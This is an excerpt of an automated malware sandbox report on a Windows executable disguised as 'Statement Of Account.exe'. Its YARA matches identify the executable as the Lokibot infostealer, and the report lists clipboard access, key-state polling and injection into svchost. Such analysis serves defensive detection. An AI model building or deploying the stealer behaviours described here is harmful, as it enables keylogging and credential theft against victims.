Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: svchost.exe, svchost.exe, 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046C5D0
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00459FFF
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_00459FFF
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046C5D0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState, 0_2_00456354
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0047C08E SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx, 0_2_0047C08E
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0047C08E SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 3_2_0047C08E

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: Statement Of Account.exe PID: 6976, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Statement Of Account.exe PID: 6540, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Statement Of Account.exe PID: 1124, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Statement Of Account.exe PID: 6568, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Statement Of Account.exe PID: 6416, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 5648, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Contains functionality to call native functions
